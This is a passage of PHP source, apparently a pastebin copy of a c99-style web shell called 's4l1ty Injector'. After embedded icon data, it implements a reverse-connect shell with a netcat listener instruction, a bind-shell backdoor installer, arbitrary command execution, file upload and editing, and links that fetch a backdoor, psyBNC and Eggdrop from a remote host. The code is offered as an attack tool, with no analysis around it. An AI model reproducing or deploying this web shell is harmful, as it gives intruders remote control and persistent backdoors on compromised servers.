  3149. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  3150. "u4tLAgEAOw==",
  3151. "ext_txt"=>
  3152. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  3153. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  3154. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  3155. "ext_wri"=>
  3156. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  3157. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  3158. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  3159. "ext_xml"=>
  3160. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  3161. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3162. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  3163. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  3164. "IQA7"
  3165. );
  3166. //Untuk optimalisasi ukuran dan kecepatan.
  3167. $imgequals = array(
  3168.   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  3169.   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  3170.   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  3171.   "ext_html"=>array("ext_html","ext_htm"),
  3172.   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  3173.   "ext_lnk"=>array("ext_lnk","ext_url"),
  3174.   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  3175.   "ext_doc"=>array("ext_doc","ext_dot"),
  3176.   "ext_js"=>array("ext_js","ext_vbs"),
  3177.   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  3178.   "ext_wri"=>array("ext_wri","ext_rtf"),
  3179.   "ext_swf"=>array("ext_swf","ext_fla"),
  3180.   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  3181.   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  3182. );
  3183. if (!$getall) {
  3184.   header("Content-type: image/gif");
  3185.   header("Cache-control: public");
  3186.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  3187.   header("Cache-control: max-age=".(60*60*24*7));
  3188.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  3189.   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  3190.   if (empty($images[$img])) {$img = "small_unk";}
  3191.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  3192.   echo base64_decode($images[$img]);
  3193. }
  3194. else {
  3195.   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  3196.   natsort($images);
  3197.   $k = array_keys($images);
  3198.   echo  "<center>";
  3199.   foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  3200.   echo "</center>";
  3201. }
  3202. exit;
  3203. }
  3204. if ($act == "about") {
  3205.   echo "<center><b>Credits: s4l1ty<br>Please report bugs to <a href=\"mailto:s4l1ty@hotmail.com\">s4l1ty</a></b>";
  3206. }
  3207. if ($act == "backc") {
  3208.   $ip = $_SERVER["REMOTE_ADDR"];
  3209.   $msg = $_POST['backcconnmsg'];
  3210.   $emsg = $_POST['backcconnmsge'];
  3211.   echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
  3212.   echo("$msg");
  3213.   echo("$emsg");
  3214. }
  3215. if ($act == "shbd"){
  3216.   $msg = $_POST['backcconnmsg'];
  3217.   $emsg = $_POST['backcconnmsge'];
  3218.   echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
  3219.   Bind Port: <input type='text' name='backconnectport' value='5992'>
  3220.   <input type='hidden' name='use' value='shbd'>
  3221.   <input type='submit' value='Install Backdoor'></form>");
  3222.   echo("$msg");
  3223.   echo("$emsg");
  3224.   echo("</center>");
  3225. }
  3226. echo "</td></tr></table>\n";
  3227. //COMMANDS PANEL
  3228. ?>
  3229. <div  class=barheader2><b>.: COMMANDS PANEL :.</b></div>
  3230. <table class=mainpanel>
  3231. <?php
  3232. if (!$safemode) {
  3233. ?>
  3234. <tr><td align=right>Command:</td>
  3235. <td><form method="POST">
  3236.     <input type=hidden name=act value="cmd">
  3237.     <input type=hidden name="d" value="<?php echo $dispd; ?>">
  3238.     <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
  3239.     <input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute">
  3240.     </form>
  3241. </td></tr>
  3242. <tr><td align=right>Quick Commands:</td>
  3243. <td><form method="POST">
  3244.     <input type=hidden name=act value="cmd">
  3245.     <input type=hidden name="d" value="<?php echo $dispd; ?>">
  3246.     <input type=hidden name="cmd_txt" value="1">
  3247.     <select name="cmd">
  3248.     <?php
  3249.    foreach ($cmdaliases as $als) {
  3250.      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
  3251.     }
  3252.     foreach ($cmdaliases2 as $als) {
  3253.       echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
  3254.     }
  3255.     ?>
  3256.     </select> -
  3257.     <input type=submit name=submit value="Execute">
  3258.     </form>
  3259. </td></tr>
  3260. <?php
  3261. }
  3262. ?>
  3263. <tr><td align=right>Kernel Info:</td>
  3264. <td><form method="post" action="http://google.com/search">
  3265.     <input type="hidden" name="client" value="firefox-a">
  3266.     <input type="hidden" name="rls" value="org.mozilla:en-US:official">
  3267.     <input type="hidden" name="hl" value="en">
  3268.     <input type="hidden" name="hs" value="b7p">
  3269.     <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> -
  3270.     <input type=submit name="btnG" VALUE="Search">
  3271.     </form>
  3272. </td></tr>
  3273. <tr><td align=right>Upload:</td>
  3274. <td><form method="POST" enctype="multipart/form-data">
  3275.     <input type=hidden name=act value="upload">
  3276.     <input type=hidden name="miniform" value="1">
  3277.     <input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?>
  3278.     </form>
  3279. </td></tr>
  3280. <?php /* s4l1ty */ ?>
  3281. <script language="javascript">
  3282. function set_arg(txt1,txt2) {
  3283.   document.forms.fphpfsys.arg1.value = txt1;
  3284.   document.forms.fphpfsys.arg2.value = txt2;
  3285.   }
  3286. </script>
  3287. <tr><td align=right>PHP Filesystem:</td>
  3288. <td><form name="fphpfsys" method="POST"><input type=hidden name=act value="phpfsys"><input type=hidden name="d" value="<?php echo $dispd; ?>">
  3289.     <select name="phpfsysfunc">
  3290.     <?php
  3291.    foreach ($phpfsaliases as $als) {
  3292.      if ($als[1]==$phpfsysfunc) { echo "<option selected value=\"".$als[1]."\">".$als[0]."</option>"; }
  3293.       else { echo "<option value=\"".$als[1]."\">".$als[0]."</option>";  }
  3294.     }
  3295.     ?>
  3296.     </select>
  3297.     File/Dir/URL: <input type="text" name="arg1" id="a1" size="40" value="<?php echo htmlspecialchars($arg1); ?>">
  3298.     To/Max: <input type="text" name="arg2" size="50" value="<?php echo htmlspecialchars($arg2); ?>">
  3299.     <input type=submit name=submit value="Execute"><hr noshade size=1>
  3300.     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."passs.txt"; ?>','ipays.php')">[BackDor]</a>
  3301.     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."psy.tar.gz"; ?>','psy.tar.gz')">[psyBNC]</a>
  3302.     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."httpd.tar.gz"; ?>','httpd.tar.gz')">[Eggdrop]</a>
  3303.     </form>
  3304. </td></tr>
  3305. <tr><td align=right>Search:</td>
  3306. <td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
  3307.     <input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;
  3308.     <input type=submit name=submit value="Search">
  3309.     </form>
  3310.     </td></tr>
  3311. <tr><td align=right>Make File:</td>
  3312. <td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
  3313.     <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?>
  3314.     </form></td></tr>
  3315. <tr><td align=right>View File:</td>
  3316. <td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
  3317.     <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View">
  3318.     </form></td></tr>
  3319. </table>
  3320. <div class=barheader2 colspan=2><font color=yellow>.:[ s4l1ty Injector | #sality #s4l1ty @ irc.tux-family.com| Generated: <?php echo round(getmicrotime()-starttime,4); ?> seconds ]:.</font></div>
  3321. </body></html>
  3322. <?php chdir($lastdir); c99shexit(); ?>
Add Comment
Please, Sign In to add comment